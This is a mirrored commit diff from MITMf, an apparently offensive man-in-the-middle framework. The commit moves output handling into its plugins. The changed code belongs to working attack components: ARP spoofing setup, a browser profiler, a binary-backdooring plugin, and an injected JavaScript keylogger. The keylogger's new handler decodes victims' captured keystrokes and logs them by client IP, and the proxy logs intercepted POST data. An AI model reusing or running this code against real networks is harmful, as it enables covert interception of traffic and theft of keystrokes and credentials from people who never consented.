github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-07-06 21:12:16 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

plugins now handle their own output

Browse source
This commit is contained in:
byt3bl33d3r 2014-07-14 13:17:34 +02:00
parent 606e85be40
commit 1b6841f9c1
6 changed files with 47 additions and 56 deletions
Download patch file Download diff file Expand all files Collapse all files

2
plugins/ArpSpoof.py
View file

@ -36,7 +36,7 @@ class ArpSpoof(Plugin):
if self.options.log_level == 'debug': if self.options.log_level == 'debug':
self.debug = True self.debug = True
print "[*] %s plugin online" % self.name print "[*] ARP Spoof plugin online"
if self.setup == True: if self.setup == True:
print '[*] Setting up ip_forward and iptables' print '[*] Setting up ip_forward and iptables'
file = open('/proc/sys/net/ipv4/ip_forward', 'w') file = open('/proc/sys/net/ipv4/ip_forward', 'w')

18
plugins/BrowserProfiler.py
View file

@ -1,16 +1,32 @@
from plugins.plugin import Plugin from plugins.plugin import Plugin
from plugins.Inject import Inject from plugins.Inject import Inject
from pprint import pformat
import logging
class BrowserProfiler(Inject, Plugin): class BrowserProfiler(Inject, Plugin):
name = "Browser Profiler" name = "Browser Profiler"
optname = "browserprofiler" optname = "browserprofiler"
desc = "Attempts to enumerate all browser plugins of connected clients" desc = "Attempts to enumerate all browser plugins of connected clients"
implements = ["handleResponse","handleHeader","connectionMade", "sendPostData"]
has_opts = False has_opts = False
def initialize(self,options): def initialize(self,options):
Inject.initialize(self, options) Inject.initialize(self, options)
self.html_payload = self.get_payload() self.html_payload = self.get_payload()
print "[*] %s online" % self.name print "[*] Browser Profiler online"
def post2dict(self, string):
dict = {}
for line in string.split('&'):
t = line.split('=')
dict[t[0]] = t[1]
return dict
def sendPostData(self, request):
#Handle the browserprofiler plugin output
if 'clientprfl' in request.uri:
out = pformat(self.post2dict(request.postData))
logging.warning("%s Browser Profilerer data:\n%s" % (request.client.getClientIP(), out))
def get_payload(self): def get_payload(self):
payload = """<script type="text/javascript"> payload = """<script type="text/javascript">

4
plugins/FilePwn.py
View file

@ -16,7 +16,7 @@ from tempfile import mkstemp
try: try:
from configobj import ConfigObj from configobj import ConfigObj
except: except:
sys.exit('[-] configobj not installed!') sys.exit('[-] configobj library not installed!')
class FilePwn(Plugin): class FilePwn(Plugin):
name = "FilePwn" name = "FilePwn"
@ -55,7 +55,7 @@ class FilePwn(Plugin):
self.LinuxType = self.userConfig['targets']['ALL']['LinuxType'] self.LinuxType = self.userConfig['targets']['ALL']['LinuxType']
self.zipblacklist = self.userConfig['ZIP']['blacklist'] self.zipblacklist = self.userConfig['ZIP']['blacklist']
print "[*] %s plugin online" % self.name print "[*] FilePwn plugin online"
def binaryGrinder(self, binaryFile): def binaryGrinder(self, binaryFile):
""" """

26
plugins/jskeylogger.py
View file

@ -1,16 +1,40 @@
from plugins.plugin import Plugin from plugins.plugin import Plugin
from plugins.Inject import Inject from plugins.Inject import Inject
import logging
class jskeylogger(Inject, Plugin): class jskeylogger(Inject, Plugin):
name = "Javascript Keylogger" name = "Javascript Keylogger"
optname = "jskeylogger" optname = "jskeylogger"
desc = "Injects a javascript keylogger into clients webpages" desc = "Injects a javascript keylogger into clients webpages"
implements = ["handleResponse","handleHeader","connectionMade", "sendPostData"]
has_opts = False has_opts = False
def initialize(self,options): def initialize(self,options):
Inject.initialize(self, options) Inject.initialize(self, options)
self.html_payload = self.msf_keylogger() self.html_payload = self.msf_keylogger()
print "[*] %s plugin online" % self.name print "[*] Javascript Keylogger plugin online"
def sendPostData(self, request):
#Handle the jskeylogger plugin output
if 'keylog' in request.uri:
keys = request.postData.split(",")
del keys[0]; del(keys[len(keys)-1])
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice.replace(nice[-1:], "")
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
print "ERROR: unknown char " + n
logging.warning("%s [%s] Keys: %s" % (request.client.getClientIP(), request.headers['host'], nice))
def msf_keylogger(self): def msf_keylogger(self):
#Stolen from the Metasploit module http_javascript_keylogger #Stolen from the Metasploit module http_javascript_keylogger

16
plugins/test.py
View file

@ -1,16 +0,0 @@
from plugins.plugin import Plugin
#Uncomment to use
'''
class Test(Plugin):
name = "Test"
optname = "test"
has_opts = True
implements = ["handleResponse"]
def add_options(self,options):
options.add_argument("--testy",action="store_true",
help="This is a test option")
def initialize(self,options):
self.worked = options.test
def handleResponse(self,request,data):
print "http://" + request.client.getRequestHostname() + request.uri
'''

37
sslstrip/ServerConnection.py
View file

@ -23,7 +23,6 @@ from twisted.web.http import HTTPClient
from ResponseTampererFactory import ResponseTampererFactory from ResponseTampererFactory import ResponseTampererFactory
from URLMonitor import URLMonitor from URLMonitor import URLMonitor
from ProxyPlugins import ProxyPlugins from ProxyPlugins import ProxyPlugins
from pprint import pformat
class ServerConnection(HTTPClient): class ServerConnection(HTTPClient):
''' The server connection is where we do the bulk of the stripping. Everything that ''' The server connection is where we do the bulk of the stripping. Everything that
@ -49,13 +48,6 @@ class ServerConnection(HTTPClient):
self.contentLength = None self.contentLength = None
self.shutdownComplete = False self.shutdownComplete = False
def post2dict(self, string):
dict = {}
for line in string.split('&'):
t = line.split('=')
dict[t[0]] = t[1]
return dict
def getPostPrefix(self): def getPostPrefix(self):
return "POST" return "POST"
@ -73,33 +65,8 @@ class ServerConnection(HTTPClient):
self.endHeaders() self.endHeaders()
def sendPostData(self): def sendPostData(self):
#Handle the browserprofiler plugin output self.plugins.hook()
if 'clientprfl' in self.uri: if ('clientprfl' or 'keylog') not in self.uri:
out = pformat(self.post2dict(self.postData))
logging.warning("%s Browser Profilerer data:\n%s" % (self.client.getClientIP(), out))
#Handle the jskeylogger plugin output
elif 'keylog' in self.uri:
keys = self.postData.split(",")
del keys[0]; del(keys[len(keys)-1])
nice = ''
for n in keys:
if n == '9':
nice += "<TAB>"
elif n == '8':
nice = nice.replace(nice[-1:], "")
elif n == '13':
nice = ''
else:
try:
nice += n.decode('hex')
except:
print "ERROR: unknown char " + n
logging.warning("%s [%s] Keys: %s" % (self.client.getClientIP(), self.headers['host'], nice))
else:
logging.warning("%s Data (%s):\n%s" % (self.getPostPrefix(),self.headers['host'],self.postData)) logging.warning("%s Data (%s):\n%s" % (self.getPostPrefix(),self.headers['host'],self.postData))
self.transport.write(self.postData) self.transport.write(self.postData)